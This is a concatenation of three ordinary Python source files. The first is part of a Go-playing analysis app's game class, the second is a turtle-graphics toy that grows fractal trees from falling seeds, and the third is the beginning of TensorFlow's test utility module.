            target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast), daemon=True
        ).start()  # return faster, but bypass Kivy Clock
    def analyze_all_nodes(self, priority=0, analyze_fast=False):
        """Queue engine analysis for every node in the tree at the given priority."""
        for node in self.root.nodes_in_tree:
            node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
    def _calculate_groups(self):
        """Rebuild board, chains and prisoners by replaying every move and
        placement from the root to the current node."""
        board_size_x, board_size_y = self.board_size
        self.board = [
            [-1 for _x in range(board_size_x)] for _y in range(board_size_y)
        ]  # type: List[List[int]]  # board pos -> chain id
        self.chains = []  # type: List[List[Move]]  # chain id -> chain
        self.prisoners = []  # type: List[Move]
        self.last_capture = []  # type: List[Move]
        try:
            # for m in self.moves:
            for node in self.current_node.nodes_from_root:
                for m in node.move_with_placements:
                    self._validate_move_and_update_chains(m, True)  # ignore ko since we didn't know if it was forced
        except IllegalMoveException as e:
            raise Exception(f"Unexpected illegal move ({str(e)})")
    def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
        """Apply `move` to the board state, merging friendly chains and
        capturing opposing ones.

        Raises IllegalMoveException for occupied points, ko (unless
        `ignore_ko`) and suicide. Mutates board/chains/prisoners, so callers
        must rebuild state (_calculate_groups) if this raises.
        """
        board_size_x, board_size_y = self.board_size

        def neighbours(moves):
            # chain ids (or -1 for empty) orthogonally adjacent to `moves`
            return {
                self.board[m.coords[1] + dy][m.coords[0] + dx]
                for m in moves
                for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
                if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
            }

        # immediate recapture of a lone just-captured stone => potential ko
        ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
        self.last_capture = []
        if move.is_pass:
            return
        if self.board[move.coords[1]][move.coords[0]] != -1:
            raise IllegalMoveException("Space occupied")
        # friendly neighbouring chains get merged into the first one
        nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
        if nb_chains:
            this_chain = nb_chains[0]
            self.board = [
                [nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
            ]  # merge chains connected by this move
            for oc in nb_chains[1:]:
                self.chains[nb_chains[0]] += self.chains[oc]
                self.chains[oc] = []
            self.chains[nb_chains[0]].append(move)
        else:
            this_chain = len(self.chains)
            self.chains.append([move])
        self.board[move.coords[1]][move.coords[0]] = this_chain
        # capture opposing chains left without liberties
        opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
        for c in opp_nb_chains:
            if -1 not in neighbours(self.chains[c]):
                self.last_capture += self.chains[c]
                for om in self.chains[c]:
                    self.board[om.coords[1]][om.coords[0]] = -1
                self.chains[c] = []
        if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
            raise IllegalMoveException("Ko")
        self.prisoners += self.last_capture
        if -1 not in neighbours(self.chains[this_chain]):  # TODO: NZ rules?
            raise IllegalMoveException("Suicide")
    # Play a Move from the current position, raise IllegalMoveException if invalid.
    def play(self, move: Move, ignore_ko: bool = False, analyze=True):
        """Play `move` from the current node, advance to the new node and
        (optionally) request engine analysis for it."""
        board_size_x, board_size_y = self.board_size
        if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
            raise IllegalMoveException(f"Move {move} outside of board coordinates")
        try:
            self._validate_move_and_update_chains(move, ignore_ko)
        except IllegalMoveException:
            # board state was partially mutated; rebuild it before re-raising
            self._calculate_groups()
            raise
        played_node = self.current_node.play(move)
        self.current_node = played_node
        if analyze:
            played_node.analyze(self.engines[played_node.next_player])
        return played_node
    def set_current_node(self, node):
        """Switch to `node` and rebuild the board state for its position."""
        self.current_node = node
        self._calculate_groups()
def undo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if not cn.is_root:
cn.parent.set_favourite_child(cn)
cn = cn.parent
self.set_current_node(cn)
def redo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if cn.children:
cn = cn.favourite_child
self.set_current_node(cn)
def switch_branch(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ix = cn.parent.children.index(cn)
self.set_current_node(cn.parent.children[(ix + direction) % len(cn.parent.children)])
def place_handicap_stones(self, n_handicaps):
    """Set the root node's AB property to `n_handicaps` handicap stone positions.

    Traditional star-point style placement is used for up to 9 stones; for
    more stones on a square board, a roughly square grid is used, ordered so
    the outermost points are filled first.
    """
    board_size_x, board_size_y = self.board_size
    # hoshi-like offsets: 3 lines from the edge on 13x13+, fewer on small boards
    near_x = 3 if board_size_x >= 13 else min(2, board_size_x - 1)
    near_y = 3 if board_size_y >= 13 else min(2, board_size_y - 1)
    far_x = board_size_x - 1 - near_x
    far_y = board_size_y - 1 - near_y
    middle_x = board_size_x // 2  # what for even sizes?
    middle_y = board_size_y // 2
    if n_handicaps > 9 and board_size_x == board_size_y:
        # lay the stones out on an (approximately) square grid
        stones_per_row = math.ceil(math.sqrt(n_handicaps))
        spacing = (far_x - near_x) / (stones_per_row - 1)
        if spacing < near_x:
            # grid too dense: widen by one line on each side and recompute
            far_x += 1
            near_x -= 1
            spacing = (far_x - near_x) / (stones_per_row - 1)
        # set comprehension drops duplicate grid lines after rounding
        coords = list({math.floor(0.5 + near_x + i * spacing) for i in range(stones_per_row)})
        # sort outside-in so the first n_handicaps stones are the outermost ones
        stones = sorted(
            [(x, y) for x in coords for y in coords],
            key=lambda xy: -((xy[0] - (board_size_x - 1) / 2) ** 2 + (xy[1] - (board_size_y - 1) / 2) ** 2),
        )
    else:  # max 9
        # corners first, optional centre stone for odd counts, then edge midpoints
        stones = [(far_x, far_y), (near_x, near_y), (far_x, near_y), (near_x, far_y)]
        if n_handicaps % 2 == 1:
            stones.append((middle_x, middle_y))
        stones += [(near_x, middle_y), (far_x, middle_y), (middle_x, near_y), (middle_x, far_y)]
    self.root.set_property(
        "AB", list({Move(stone).sgf(board_size=(board_size_x, board_size_y)) for stone in stones[:n_handicaps]})
    )
@property
def board_size(self):
    """(x, y) board dimensions, as stored on the root node."""
    return self.root.board_size
@property
def stones(self):
    """All stones currently on the board, flattened from the per-chain lists.

    Uses a flattening comprehension instead of `sum(self.chains, [])`, which
    builds a new list per chain and is quadratic in the number of stones.
    Captured chains are emptied lists and contribute nothing.
    """
    return [stone for chain in self.chains for stone in chain]
@property
def ended(self):
    """Truthy when the game ended by two consecutive passes."""
    return self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass
@property
def prisoner_count(
    self,
) -> Dict:  # {colour: number of stones of that colour that were captured}
    """Count captured stones per colour, e.g. {'B': black captured, 'W': white captured}."""
    counts = {}
    for player in Move.PLAYERS:
        counts[player] = sum(1 for prisoner in self.prisoners if prisoner.player == player)
    return counts
@property
def manual_score(self):
    """Japanese-style manual score estimate, or None when it cannot be computed.

    Requires japanese rules and an ownership map from the engine; otherwise
    falls back to the engine score rounded to half points and flagged with '?',
    or None when no score is available either.
    """
    rules = self.engines["B"].get_rules(self.root)
    if not self.current_node.ownership or rules != "japanese":
        if not self.current_node.score:
            return None
        self.katrain.log(
            f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
            OUTPUT_DEBUG,
        )
        # fallback: engine score rounded to half points, marked uncertain
        return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
    board_size_x, board_size_y = self.board_size
    ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
    stones = {m.coords: m.player for m in self.stones}
    lo_threshold = 0.15  # |ownership| below this -> dame
    hi_threshold = 0.85  # |ownership| above this -> settled
    max_unknown = 10  # give up if more intersections than this are unclear
    max_dame = 4 * (board_size_x + board_size_y)

    def japanese_score_square(square, owner):
        # one intersection: 0 dame/own stone, +-1 territory, +-2 captured stone, nan unknown
        player = stones.get(square, None)
        if (
            (player == "B" and owner > hi_threshold)
            or (player == "W" and owner < -hi_threshold)
            or abs(owner) < lo_threshold
        ):
            return 0  # dame or own stones
        if player is None and abs(owner) >= hi_threshold:
            return round(owner)  # surrounded empty intersection
        if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
            return 2 * round(owner)  # captured stone
        return math.nan  # unknown!

    scored_squares = [
        japanese_score_square((x, y), ownership_grid[y][x])
        for y in range(board_size_y)
        for x in range(board_size_x)
    ]
    num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
    num_unkn = sum(math.isnan(s) for s in scored_squares)
    prisoners = self.prisoner_count
    # positive score favours black: white prisoners count for black, minus komi
    score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
    self.katrain.log(
        f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
        OUTPUT_DEBUG,
    )
    # refuse to score positions that are too unsettled or have too many dame
    if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
        return None
    return self.current_node.format_score(score)
def __repr__(self):
    """Text board diagram (one player letter per stone, '-' for empty) plus capture counts."""
    return (
        "\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
        + f"\ncaptures: {self.prisoner_count}"
    )
def write_sgf(
    self, path: str, trainer_config: Optional[Dict] = None,
):
    """Write the game as an SGF file under `path`.

    Args:
        path: directory the SGF is written into (created if needed).
        trainer_config: feedback/eval settings; defaults to the app's
            'trainer' config section.

    Returns:
        A localized "sgf written" confirmation message with the file name.
    """
    if trainer_config is None:
        trainer_config = self.katrain.config("trainer")
    save_feedback = trainer_config["save_feedback"]
    eval_thresholds = trainer_config["eval_thresholds"]

    def player_name(player_info):
        # e.g. localized "<type> (<subtype>)" when no explicit name is set
        return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"

    # strip characters that are invalid in (Windows) file names
    player_names = {
        bw: re.sub(
            r"['<>:\"/\\|?*]", "", self.root.get_property("P" + bw) or player_name(self.katrain.players_info[bw])
        )
        for bw in "BW"
    }
    game_name = f"katrain_{player_names['B']} vs {player_names['W']} {self.game_id}"
    file_name = os.path.abspath(os.path.join(path, f"{game_name}.sgf"))
    os.makedirs(os.path.dirname(file_name), exist_ok=True)
    # annotate a player's moves when configured to, or when that player is human
    show_dots_for = {
        bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
    }
    sgf = self.root.sgf(
        save_comments_player=show_dots_for, save_comments_class=save_feedback, eval_thresholds=eval_thresholds
    )
    with open(file_name, "w", encoding="utf-8") as f:
        f.write(sgf)
    return i18n._("sgf written").format(file_name=file_name)
def analyze_extra(self, mode):
    """Request additional engine analysis for the current node.

    Args:
        mode: one of
            "extra"    - re-analyze the current node with more visits.
            "sweep"    - fast-analyze every candidate move on the board.
            "equalize" - bring every candidate move up to the max visits seen.
    """
    stones = {s.coords for s in self.stones}
    cn = self.current_node
    engine = self.engines[cn.next_player]
    if mode == "extra":
        visits = cn.analysis_visits_requested + engine.config["max_visits"]
        self.katrain.controls.set_status(f"Performing additional analysis to {visits} visits")
        cn.analyze(engine, visits=visits, priority=-1_000, time_limit=False)
        return
    elif mode == "sweep":
        board_size_x, board_size_y = self.board_size
        if cn.analysis_ready:
            policy_grid = (
                var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
                if self.current_node.policy
                else None
            )
            # NOTE(review): if policy_grid is None here, the filter's second
            # clause and the sort key below would raise TypeError — presumably
            # policy is always present when analysis_ready; confirm.
            analyze_moves = sorted(
                [
                    Move(coords=(x, y), player=cn.next_player)
                    for x in range(board_size_x)
                    for y in range(board_size_y)
                    if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
                ],
                key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
            )
        else:
            # no analysis yet: sweep every empty intersection, unsorted
            analyze_moves = [
                Move(coords=(x, y), player=cn.next_player)
                for x in range(board_size_x)
                for y in range(board_size_y)
                if (x, y) not in stones
            ]
        visits = engine.config["fast_visits"]
        self.katrain.controls.set_status(f"Refining analysis of entire board to {visits} visits")
        priority = -1_000_000_000  # lowest priority: full-board background sweep
    else:  # mode=='equalize':
        if not cn.analysis_ready:
            self.katrain.controls.set_status(i18n._("wait-before-equalize"), self.current_node)
            return
        analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
        visits = max(d["visits"] for d in cn.analysis["moves"].values())
        self.katrain.controls.set_status(f"Equalizing analysis of candidate moves to {visits} visits")
        priority = -1_000
    for move in analyze_moves:
        cn.analyze(
            engine, priority, visits=visits, refine_move=move, time_limit=False
        )  # explicitly requested so take as long as you need
def analyze_undo(self, node):
    """Decide whether teaching-mode auto-undo should trigger for `node`.

    Called once analysis for a just-played move is available: when the point
    loss crosses a configured threshold, the move is undone and a teaching
    message is shown. The decision is cached on node.auto_undo so it only
    happens once per node.
    """
    train_config = self.katrain.config("trainer")
    move = node.move
    # only act once, on the current node, after analysis has arrived
    if node != self.current_node or node.auto_undo is not None or not node.analysis_ready or not move:
        return
    points_lost = node.points_lost
    thresholds = train_config["eval_thresholds"]
    num_undo_prompts = train_config["num_undo_prompts"]
    # find which threshold bracket the mistake falls into
    i = 0
    while i < len(thresholds) and points_lost < thresholds[i]:
        i += 1
    num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
    if num_undos == 0:
        undo = False
    elif num_undos < 1:  # fractional setting is treated as a probability
        undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
    else:
        # integer setting: allow up to num_undos attempts at this position
        undo = len(node.parent.children) <= num_undos
    node.auto_undo = undo
    if undo:
        self.undo(1)
        self.katrain.controls.set_status(
            i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost)
        )
    self.katrain.update_state()
|
PLANT IT ALLL.py | from random import *
from turtle import *
from tkinter import *
#from multiprocessing import Process
#processes = []
# --- tunables and global state ---
SEE = False  # when True, tree() interleaves multitask() calls while drawing
# dismod: random shrink factors for child branches/roots
# NOTE(review): a, b, c, d look unused in this file — confirm before removing
dismod = (2/3,3/4,3/5,7/8) ; c = 2 ; d = 5
a = 15 ; b = 40 ; minpix = 10 ; wmod = 3/5  # minpix: recursion cutoff, wmod: width shrink per level
ground = - 225  # y coordinate of the ground line
seeds = 0  # seed counter shown in the HUD
rightmost = 0  # rightmost x of any planted tree
leftmost = 0  # leftmost x of any planted tree
listen()  # receive keyboard events
w = Screen()
w.tracer(0,0)  # disable auto-refresh; we call w.update() manually each frame
w.bgcolor("black")
zulu = 0  # gives each registered tree shape a unique name
# gnd draws the ground; seee writes the HUD text
gnd = Turtle() ; seee = Turtle() ; seee.color("white") ; seee.ht()
gnd.pu()
gnd.ht()
gnd.color("white")
gnd.begin_fill()
gnd.goto(-1000 , ground)
# NOTE(review): towards() only *returns* an angle; its result is unused here —
# confirm whether setheading was intended
gnd.towards( 0 , ground )
gnd.pd()
# wobbly ground line: 2000 short steps with small random turns
for _ in range(2000) :
    gnd.fd(1) ; gnd.lt(randint(-20,21)/3)
    if _%5 == 0 : gnd.setheading(0)  # re-level every 5 steps
gnd.goto(1000 , ground - 200 )
gnd.goto(-1000 , ground - 200 )
gnd.goto(-1000 , ground )
gnd.end_fill()
seee.pu()
seee.goto( 0 , 100)
seee.write("PLANT")
# pool of 100 reusable seed turtles
T = []
for _ in range (100) : T.append(Turtle()) ; seeds += 1
def see():
    """Redraw the HUD: remaining seeds and the horizontal spread of trees."""
    seee.clear()
    status = f"Seeds : {seeds}\nDistance : {int(rightmost - leftmost)}"
    seee.write(status)
def make_t(t):
    """Initialise one seed turtle: pen up, white, hidden, no fall speed, heading ~up."""
    t.pu()
    t.color("white")
    t.ht()
    t.setheading(randint(85, 95))
    t.dy = 0
# configure every seed turtle in the pool
for t in T :
    make_t(t)
    t.shape("circle")
    t.shapesize(0.5)
    t.g = 0.05  # per-frame increase of fall speed ("gravity")
    t.setundobuffer(0)  # no undo history, saves memory
    t.taken = False  # currently falling / in use
    t.used = False  # has ever been activated
    t.tree = False  # has landed and is being turned into a tree
    t.once = False  # retired: already grew into a tree
def multitask() :
    """Advance every active seed one animation frame and refresh the screen.

    Falling seeds accelerate downward; a seed reaching the ground grows into
    a tree via PLANT() and is retired (once = True).
    """
    global seeds , leftmost , rightmost
    for t in T :
        if t.used :
            if t.taken and not t.tree :
                t.fd(1)  # slight drift along the ~85-95 degree heading
                if t.ycor() >= ground :
                    # still airborne: apply velocity, then gravity
                    t.sety(t.ycor() - t.dy)
                    t.dy += t.g
                if not t.ycor() >= ground :
                    # touched down: grow a tree here
                    t.tree = True
                    # track horizontal spread for the HUD distance readout
                    if t.xcor() > rightmost : rightmost = t.xcor()
                    if t.xcor() < leftmost : leftmost = t.xcor()
                    t.pd()
                    t.ht()
                    PLANT(t , 2*randint(15,40)/2 , randint(20,35) , randint(40,65)/10 )
                    #make_t(t)
                    t.tree = False
                    t.taken = False
                    t.once = True
                    # NOTE(review): nesting of the next line is ambiguous in the
                    # mangled source; as placed it can never fire since once was
                    # just set True — confirm against the original file.
                    if not t.once : seeds += 1 ; see()
            #process = Process(target = tree , args = ( t , 40 , 30 , 4 ) )
            #processes.append( process )
            #process.start()
    w.update()
def dot(x , y) :
    """Mouse-click handler: drop the first available seed at (x, y)."""
    global seeds
    for t in T :
        # pick a seed that is neither in flight nor retired
        if not t.taken and not t.once :
            if not t.used : t.used = True ; t.st()  # first activation: show it
            t.taken = True
            t.ht()
            seeds -= 1
            see()
            t.goto(x , y)
            t.st()
            break
def fresh():
    """Wipe all drawings and reset the recorded horizontal extent."""
    global leftmost, rightmost
    rightmost = 0
    leftmost = 0
    for t in T:
        t.clear()
def tree(t,x,y,s) :
    """Recursively draw a fractal tree branch.

    t: turtle, x: branch length, y: branching angle, s: pen width.
    Recursion stops once the branch length drops below minpix.
    """
    if x < minpix :
        if SEE : multitask()  # keep the seed animation running during long draws
        return
    else :
        # child branches: thinner pen, slightly narrower angle, random shrink factor
        zzz = s*wmod ; zz = y*0.98 ; z = choice(dismod)*x
        t.width(s) ; t.fd(x)
        tree(t,z*1.01,zz,zzz)  # middle branch kept slightly longer
        lll = choice((1,-1))  # randomize which side branches first
        t.lt(lll*y)
        tree(t,z,zz,zzz)
        t.rt(lll*2*y)
        tree(t,z,zz,zzz)
        #if z < minpix : multitask()
        t.lt(lll*y) ; t.bk(x)  # restore heading and position for the caller
def root(t,x,y,w) :
    """Recursively draw a wiggly root segment below ground (mirror of tree()).

    t: turtle, x: segment length, y: branching angle, w: pen width.
    """
    t.width(w)
    s = w*wmod  # child roots get thinner
    i = int(x)
    z = x*choice(dismod)
    zz = choice((z,z/10))  # occasionally a stunted side root
    aaa = choice((1,2))  # randomly swap which side gets the long/short child
    if aaa == 1 : zzz = z ; zzzz = zz
    else : zzz = zz ; zzzz = z
    yy = y - 0.1
    # draw the segment as i small wobbly steps, remembering each turn/distance
    angs = []
    diss = []
    for _ in range(i) : angs.append(randint(-10,10)) ; diss.append(randint(9,10)/10)
    for _ in range(i) : t.fd(diss[_]) ; t.lt(angs[_])
    t.lt(y)
    #t.fd(z)
    #t.bk(z)
    if x > minpix : root(t , zzz,yy,s)
    t.rt(2*y)
    if x > minpix : root(t , zzzz,yy,s)
    t.lt(y)
    # retrace the wobbly path exactly, in reverse, to return to the start
    for _ in range(i) : t.rt(angs[i - _ - 1]) ; t.bk(diss[i - _ - 1])
def PLANT(p1 , p2 , p3 , p4 ) :
    """Draw a full tree (crown + roots) and register it as a compound shape.

    The drawing is captured as two polygons and registered as a named shape,
    so the single turtle p1 can display the whole tree cheaply afterwards.
    p1: turtle, p2: trunk length, p3: branch angle, p4: trunk width.
    """
    global zulu
    Temp_x = p1.xcor()
    Temp_y = p1.ycor()
    # record the crown outline as a polygon
    p1.begin_poly()
    tree(p1 , p2 , p3 , p4)
    Treah = p1.get_poly()
    p1.setheading(-90)  # roots grow downward
    p1.color("black")
    p1.begin_poly()
    root(p1 , p2 , p3 , p4)
    Treag = p1.get_poly()
    # combine crown (white) and roots (red) into one uniquely-named shape
    Treaa = Shape("compound")
    Treaa.addcomponent(Treah , "white")
    Treaa.addcomponent(Treag , "red")
    w.register_shape("Tree" + str(zulu) , Treaa)
    p1.shape("Tree" + str(zulu))
    p1.setheading(90)
    # NOTE(review): this recentres every tree at x=0; Temp_x/Temp_y restore is
    # commented out below — confirm intended
    p1.goto(0,-110)
    #p1.setx(Temp_x)
    #p1.sety(p1.ycor() + Temp_y)
    p1.clear()
    p1.st()
    zulu += 1
#x = -250
#y = 100
#for _ in range(10) : dot(x , y) ; x+= 2*randint(25,50)
x = 0
# main loop: poll for clicks/keys, randomly rain seeds from the sky, animate
while True :
    x += 1
    # NOTE(review): handlers are re-registered every frame; registering once
    # before the loop would suffice — confirm
    onscreenclick(dot)
    # random chance per frame to drop a seed from y=300
    if x%randint(1,100) == 0 : x = 0 ; dot(randint(-500,500) , 300 )
    #if x%5000 == 0 : fresh()
    onkey(fresh , "w" )  # press 'w' to wipe the drawing
    #see()
    multitask()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
  """Default stub: False unless shadowed by the BUILD-provided import below."""
  return False


try:
  from tensorflow.python.framework.is_xla_test_true import is_xla_enabled  # pylint: disable=g-import-not-at-top, unused-import
except Exception:  # pylint: disable=broad-except
  pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
  """Default stub: False unless shadowed by the BUILD-provided import below."""
  return False


try:
  from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled  # pylint: disable=g-import-not-at-top, unused-import
except Exception:  # pylint: disable=broad-except
  pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
  """Default stub: False unless shadowed by the BUILD-provided import below."""
  return False


try:
  from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled  # pylint: disable=g-import-not-at-top, unused-import
except Exception:  # pylint: disable=broad-except
  pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
  """Returns the name of a GPU device if available or the empty string."""
  for device in device_lib.list_local_devices():
    if device.device_type in ("GPU", "SYCL"):
      return compat.as_str(device.name)
  return ""
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  graph_def = graph.as_graph_def()
  found = {}
  for node in graph_def.node:
    if node.name not in expected_ops:
      continue
    if expected_ops[node.name] != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (node.name, expected_ops[node.name], node.op))
    found[node.name] = node
  if set(expected_ops.keys()) != set(found.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), found.keys()))
  return found
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent. This function
  ignores randomized attribute values that may appear in V2 checkpoints.

  Args:
    expected: The `GraphDef` we expected.
    actual: The `GraphDef` we have.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  # Note the (actual, expected) argument order of the shared implementation.
  assert_equal_graph_def(actual, expected, checkpoint_v2=True,
                         hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
                              hash_table_shared_name=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.
    hash_table_shared_name: boolean determining whether to ignore randomized
      shared_names that appear in HashTableV2 op defs.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  # Thin wrapper around the shared implementation below.
  assert_equal_graph_def(actual, expected, checkpoint_v2,
                         hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
                           hash_table_shared_name=False):
  """Shared implementation behind the v1/v2 graph-def equality asserts.

  Optionally strips nondeterministic checkpoint temp names and hash-table
  shared names in place, then compares serialized protos via the native
  EqualGraphDef wrapper.
  """
  if not isinstance(actual, graph_pb2.GraphDef):
    raise TypeError("Expected tf.GraphDef for actual, got %s" %
                    type(actual).__name__)
  if not isinstance(expected, graph_pb2.GraphDef):
    raise TypeError("Expected tf.GraphDef for expected, got %s" %
                    type(expected).__name__)

  if checkpoint_v2:
    _strip_checkpoint_v2_randomized(actual)
    _strip_checkpoint_v2_randomized(expected)

  if hash_table_shared_name:
    _strip_hash_table_shared_name(actual)
    _strip_hash_table_shared_name(expected)

  diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
                                                expected.SerializeToString())
  if diff:
    raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
  """Compares MetaGraphDefs `a` and `b` in unit test class `tester`.

  Compares collection_defs entry by entry (parsing proto-typed collections),
  then graph_defs (ignoring checkpoint randomization), then the remaining
  fields. NOTE: mutates `a` and `b` by clearing already-compared fields.
  """
  # Carefully check the collection_defs
  tester.assertEqual(set(a.collection_def), set(b.collection_def))
  collection_keys = a.collection_def.keys()
  for k in collection_keys:
    a_value = a.collection_def[k]
    b_value = b.collection_def[k]
    proto_type = ops.get_collection_proto_type(k)
    if proto_type:
      a_proto = proto_type()
      b_proto = proto_type()
      # Number of entries in the collections is the same
      tester.assertEqual(
          len(a_value.bytes_list.value), len(b_value.bytes_list.value))
      for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
                                              b_value.bytes_list.value):
        a_proto.ParseFromString(a_value_item)
        b_proto.ParseFromString(b_value_item)
        tester.assertProtoEquals(a_proto, b_proto)
    else:
      # Fix: use assertEqual -- assertEquals is a deprecated alias (removed in
      # newer unittest versions) and inconsistent with the calls above.
      tester.assertEqual(a_value, b_value)

  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("collection_def")
  b.ClearField("collection_def")

  # Check the graph_defs.
  assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
  # Check graph_def versions (ignored by assert_equal_graph_def).
  tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("graph_def")
  b.ClearField("graph_def")

  tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
